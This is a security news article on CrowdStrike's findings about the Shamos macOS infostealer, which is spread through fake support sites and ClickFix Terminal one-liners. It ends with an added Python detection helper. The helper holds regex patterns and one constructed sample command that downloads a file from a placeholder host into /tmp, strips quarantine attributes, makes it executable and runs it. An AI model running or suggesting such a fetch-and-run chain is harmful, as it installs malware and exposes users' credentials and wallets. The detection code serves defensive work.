
Deceptive macOS support websites distribute the Shamos infostealer using the ClickFix method.

Cybercriminals are exploiting the technical problems macOS users look up help for to infect their machines with the Shamos infostealer, CrowdStrike researchers warn. To circumvent the macOS security features that would normally block such an installation, the criminals use a technique known as ClickFix, which depends on the victim executing a malicious command themselves. Between June and August 2025, the attackers set up fraudulent macOS help websites and used Google Search ads to steer users to them. The fraudulent sites, hosted on mac-safer[.]com and rescue-mac[.]com, offered misleading troubleshooting instructions that did not resolve the user's problem but instead led to the installation of Shamos, a variant of the Atomic macOS infostealer, once the user copied, pasted, and ran a specific one-line command in the Terminal app.

The malicious command downloads the Shamos Mach-O file into the /tmp/ directory, removes the file's extended attributes so that Gatekeeper does not inspect it, marks it executable, and runs the stealer. Shamos then runs anti-VM checks to make sure it is not executing inside a sandbox.

The malware performs host reconnaissance and data collection, searching for cryptocurrency wallet files and sensitive credential files. It attempts to exfiltrate this data, including information from Keychain, Apple Notes, and browsers, by using curl to send it in a ZIP archive named out.zip.i2. The malware also downloads a spoofed Ledger Live wallet application and a botnet module, and attempts to create a plist file for persistence.

Researchers have identified a second malvertising campaign delivering Shamos through a GitHub repository that falsely claims to offer the popular iTerm2 terminal emulator; its installation instructions contain the same malicious command.

The ClickFix technique has gained popularity because it works: convincing error messages, fake CAPTCHA prompts, and overly technical instructions confuse average users into running the command.
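The behaviour described above (download into /tmp, strip extended attributes, chmod, execute) is a recognisable chain in shell or EDR process telemetry. The following detection helper is an added example written for this article, not code from the CrowdStrike report or the campaign; the sample command lines and the placeholder hosts are constructed, and the scoring threshold is an assumption for illustration.

```python
import re

# One regex per stage of the chain the article describes. A single stage is
# common in benign admin work, so we only flag when several stages co-occur
# in the same command line (threshold is an assumption, tune to your telemetry).
INDICATORS = {
    "download_to_tmp": re.compile(
        r"\b(curl|wget)\b[^;&|]*(\s(-o|-O|--output)\s*|>\s*)/tmp/\S+"),
    "quarantine_strip": re.compile(
        r"\bxattr\s+(-c|-cr|-rc|-d\s+com\.apple\.quarantine)\b"),
    "mark_executable": re.compile(r"\bchmod\s+\S+\s+/tmp/\S+"),
    # A /tmp path appearing as a command (start of line or after ; & |).
    "execute_from_tmp": re.compile(r"(^|[;&|]\s*)/tmp/\S+"),
}

SUSPICIOUS_THRESHOLD = 3  # assumption: three of four stages in one line


def score_clickfix_command(cmdline: str) -> dict:
    """Return which chain stages a command line matches and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return {"hits": hits, "suspicious": len(hits) >= SUSPICIOUS_THRESHOLD}


# Constructed sample process command lines (hosts are placeholders).
SAMPLE_COMMANDS = [
    # Stand-in for a ClickFix one-liner: all four stages in one line.
    "curl -fsSL https://support.example.invalid/fix -o /tmp/update"
    " && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update",
    # Benign: fetch a JSON file into /tmp and read it.
    "curl -s https://pkg.example.invalid/release.json -o /tmp/release.json"
    " && cat /tmp/release.json",
    # Benign: developer marking their own script executable outside /tmp.
    "chmod +x ~/bin/deploy.sh && ~/bin/deploy.sh",
]


def triage(commands=SAMPLE_COMMANDS) -> list:
    """Score each command line; returns (cmdline, result) pairs."""
    return [(cmd, score_clickfix_command(cmd)) for cmd in commands]


if __name__ == "__main__":
    for cmd, result in triage():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['hits']}  {cmd[:60]}...")
```

In practice the input would come from process-creation events for Terminal, zsh or bash rather than a hard-coded list.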

Categories: Cybersecurity Threats, Malware Delivery Techniques, Social Engineering Tactics 

Tags: Malware, macOS, Shamos, ClickFix, Cybercriminals, Infostealer, Social Engineering, Malvertising, Data Exfiltration, Terminal Commands 
